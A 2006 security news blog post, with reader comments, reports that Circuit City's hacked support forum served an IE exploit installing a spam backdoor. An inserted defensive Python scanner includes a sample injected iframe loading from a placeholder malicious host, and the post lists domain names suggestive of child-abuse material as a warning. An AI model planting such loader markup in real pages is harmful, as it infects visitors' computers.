
Circuit City Support-Site Hack Installed Spamming Program

The customer support Web site for Richmond-based Circuit City, a leading supplier of computers and other consumer electronics, was for several weeks serving up an invasive computer virus to any visitor who browsed the site with an unpatched version of Microsoft's Internet Explorer Web browser.

It appears that unknown hackers broke into the retailer's support forum via a recently patched security flaw in Invision Power Forum, the software the company uses to run the site. Anyone who visited the forum in IE without the protection afforded by a security patch Microsoft released in January most likely got whacked with an exploit that drops a nasty program which gives attackers control over the victim's PC.

Circuit City spokesman Bill Cimino said the company learned of the breach today and has removed the attack code that plants the malicious program and updated its site software to the latest, patched version. Cimino said Circuit City also planned to notify the forum's registered users of the potential threat. Cimino said the problem was confined to its forum.circuitcity.com Web site, and that at no time was the company's main CircuitCity.com page affected.

The forum was hacked some time on May 13, and chances are quite a few people have been potentially exposed to this threat. According to Web traffic-monitoring company Alexa, CircuitCity.com is among the Web's 500 most-visited sites.

Cimino said the company is still trying to determine how many people visited the forum since May 13, but he noted that only about 200 registered users did so during that time. The user forum is hosted by a separate company on a different Web server than CircuitCity.com, but it is reachable from the company's home page.

Up until this afternoon, a vulnerable IE browser visiting the support forum would have silently contacted a .biz Web site -- hosted in Russia -- which tries to install a program that opens a "back door" on the victim's computer. The attackers could then have used the "back door" to come back whenever they wanted to install programs, delete files, change system settings etc.
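As an added illustration, not part of the original story, this is the kind of check a site operator could run to spot an injected loader of the sort described above: a scan of a page's markup for script, iframe, frame, object or embed references that pull content from hosts other than the site's own. The sample page, the allowlist and the `.invalid` host are constructed placeholders.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

# Attributes through which a page can pull in remote, executable content.
SRC_ATTRS = {
    "script": ("src",),
    "iframe": ("src",),
    "frame": ("src",),
    "object": ("data",),
    "embed": ("src",),
}


class ExternalRefFinder(HTMLParser):
    """Collects (tag, url) pairs for every remote resource the page loads."""

    def __init__(self):
        super().__init__()
        self.refs = []

    def handle_starttag(self, tag, attrs):
        for wanted in SRC_ATTRS.get(tag, ()):
            for name, value in attrs:
                if name == wanted and value:
                    self.refs.append((tag, value.strip()))


def find_unexpected_loaders(html, allowed_hosts):
    """Return (tag, url) pairs whose host is not in allowed_hosts.

    Relative URLs have no host, are same-origin and are ignored;
    anything absolute that points off-site is reported for review."""
    finder = ExternalRefFinder()
    finder.feed(html)
    allowed = {h.lower() for h in allowed_hosts}
    findings = []
    for tag, url in finder.refs:
        host = urlparse(url).hostname
        if host and host.lower() not in allowed:
            findings.append((tag, url))
    return findings


# Constructed sample page: one legitimate same-origin script and one
# injected zero-size iframe pointing at an off-site placeholder host.
SAMPLE_PAGE = """
<html><head><script src="/forums/js/board.js"></script></head>
<body><h1>Support Forum</h1>
<iframe src="http://malicious-loader.biz.invalid/ie.php" width=0 height=0></iframe>
</body></html>
"""

if __name__ == "__main__":
    for tag, url in find_unexpected_loaders(SAMPLE_PAGE, {"forum.circuitcity.com"}):
        print(f"unexpected {tag} loading {url}")
```

Running this against a known-good copy of each forum template and diffing the output over time turns the check into a simple integrity monitor.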

The threat in this case was a thing called "Galapoper," which according to anti-virus firm Panda Software "sends spam messages with highly variable characteristics, which it composes with the information it obtains from several servers. It can be instructed to modify those e-mail messages every 10 minutes, or whenever an amount of 70,000 e-mail messages sent is reached."

I should also note that the site used in this exploit is on the same block of Internet addresses as a Web server in Russia that -- according to Web site monitoring company Netcraft -- is the same group of servers I wrote about in an investigative story earlier this year as being connected to disturbing new advancements in keystroke-logging programs.

[SAFETY ALERT: Unless you are a computer security expert and preferably not using Microsoft Windows, please do not attempt to visit any of the sites mentioned in this paragraph.] Among the other domains on this same Russian Internet address space are dozens of porn sites featuring content that borders on child pornography, with sites like "lolita-links," "little-boyz.com," "littlelust.com," "tinyorgy.com" and "pay-sites.lolita-preteen-bbs.com".

The Russian company hosting the .biz site that the Circuit City support forum virus contacted also hosts a number of sites used to download bogus anti-spyware applications. These programs are proliferated by browser exploits that install themselves and then scare victims with false reports about spyware infections, all to trick the user into paying for anti-spyware software that usually doesn't even work.

This group of Web servers also is home to many of the sites that were taking advantage of the flaw even before Microsoft issued its patch. Allow me to take you back: This security update was the very first that Microsoft shipped in 2006. Hundreds of malicious Web sites had been exploiting the flaw in the final weeks of 2005 and early 2006 to install password-stealing Trojan horse programs on IE users' computers. Hundreds more innocent Web sites were hacked and seeded with the exploit code, including at least two I found in my own reporting. At least two independent security experts developed and made public their own security patches to fix the problem before Microsoft issued an official update.

By Brian Krebs  |  June 1, 2006; 3:26 PM ET
Categories:  Latest Warnings  

Comments

God, Microsoft sucks.

Posted by: Sloopydrew | June 2, 2006 3:53 PM | Report abuse

For a police state, there certainly is a lot of crime and lawlessness in Russia.

I wish my ISP would offer the option of blocking contact with all IP addresses in the following crime-ridden 3rd World countries: Russia, Brazil, China, and all of Eastern Europe.

A regional block would certainly be easier than reading the ISC diary and adding sites and IP addresses, one by one, to my block lists (HOSTS file and I.E.'s Restricted Sites Zone).

Posted by: Ken L | June 2, 2006 4:34 PM | Report abuse

Should have used Kaspersky!

Posted by: Jo | June 3, 2006 12:35 AM | Report abuse

Firefox is the answer...

Posted by: Dave | June 3, 2006 9:41 PM | Report abuse

"Cimino said the problem was confined to its forum.circuitcity.com Web site, and that at no time was the company's main CircuitCity.com page affected."

So, um, only our loyal/most confused (pick one) customers were affected. Anybody thinking of becoming a NEW customer need not worry because we only throw you under the bus AFTER we have your money.

Congratulations on the new job, Scott (McClellan)!!!

Posted by: GTexas | June 4, 2006 4:39 PM | Report abuse

Circuit City won't be the first nor the last that are bitten by this. Also please spare me comments about Kaspersky catching this UNLESS they caught this particular version of malware when all of the other AntiVirus companies failed. I do research in BOTH of these areas and despite warnings to normal people that Porn sites can have threats, I am usually ignored. I have waited patiently as long as nine months for some of the Trojans I have submitted to the AntiVirus companies for any of them to recognize what they are. Tell them (the AntiVirus companies) to fire up their IDA disassemblers and get to work! All of the following WILL help you:

1. Use an AntiVirus program, preferably a DIFFERENT one than the one your ISP uses. The reasoning is simple - if the ISP's AntiVirus program doesn't catch the new hour zero exploit, maybe yours will.
Please don't ask me for recommendations on this. ANY of the good ones are better than none. KEEP THEIR DATA-BASE COMPLETELY UP-TO-DATE!

2. Install a blocking hosts file - you can't have mine, it is experimental. Just do a search for "blocking hosts file" at Google and go from there.
If you use Linux or Mac OS X, say something and mine will no longer be experimental. I have a Pseudo HTTP server (you need one to answer queries on the web page that are now redirected to yourself) that works as a daemon (like a Microsoft service) on these other machines.

3. As much as I would like to say shift to Firefox, I am not going to. It doesn't have the equivalent of IE's restricted sites list. Netscape does, AND they maintain the list of abusers for you. Try it, or Opera.

4. Keep your OS patches up to date. THIS IS MANDATORY!

5. If possible, move to another Operating System (OS) like some version of Linux or Mac OS X. In this case, that may be the best protection from these pesky Microsoft viruses / malware. These other Operating Systems are COMPLETELY IMMUNE to Microsoft Windows viruses! In fact they have almost no viruses at all - the AntiVirus programs for these other operating systems are primarily geared towards removing viruses targeted at MICROSOFT WINDOWS (and the teensy amount targeted at that particular OS they are using).

6. Do some studying to catch PHISH on your own. This is one the AV companies ARE getting good at. The rules are simple - read Washington Post's excellent article on how to avoid getting caught and you WON'T need the AV companies to catch them, UNLESS the message itself can take advantage of your email client to do things automatically.

7. If you still want to continue to Microsoft Windows, get a good anti-spyware strategy. The ones that work best are the ones that prevent the spy from getting on your machine in the first place.

8. Avoid things that will cause problems. There are very badly behaved porn sites (and there ARE good ones that will NOT harm your machine) that WILL find out who you are. If you are important and do NOT want your activity known, THEY CAN AND WILL BLACKMAIL YOU! Even more important, avoid the music stealing and movie stealing programs. They will invariably lead your machine into the red zone.

Posted by: Henry Hertz Hobbit | June 7, 2006 7:58 AM | Report abuse

May I suggest running Webroot Spysweeper with the common ad sites blocker turned on. It's a great inexpensive anti-spyware. For those out there wanting to stay protected for cheap, these are the things you should run on your computer:

Avast Antivirus (Freeware)
On this during the initial setup allow it to sweep at the startup the first time around. This will help check for a pesky root-kit you don't know about.
www.avast.com

Webroot Spysweeper (if you already have it, stay on top of the version updates) (29.99)
On this, on the left side click on options, then turn on whatever has a red X next to it. Also at the top schedule a weekly sweep to remind you to keep after it.
www.webroot.com

Spybot Search and Destroy (Freeware)
Good reliable freebie.
http://www.safer-networking.org/

Lavasoft Ad-aware
On this one, before a search, click on custom search and make sure all of your options are on. Then also search for low risk threats.
www.lavasoft.com (DL link is on the right side @ download.com)

Firefox (If you are running it you will notice it blocked a popup for you on this page :) )
www.mozilla.com

If you're using IE go to the internet options, then click advanced, scroll to bottom, and check empty temp. internet files when browser is closed. You can also un-check install on demand options but that's up to you. It may cause some webpages to act funny.

Don't look at anything on the net you would not look at with your mother, and avoid party poker. There is no such thing as free these days. I've seen many computers come in with their junk loaded on it along with a bit of spyware.

Good luck.

Posted by: Ryker | June 7, 2006 11:44 AM | Report abuse

© 2010 The Washington Post Company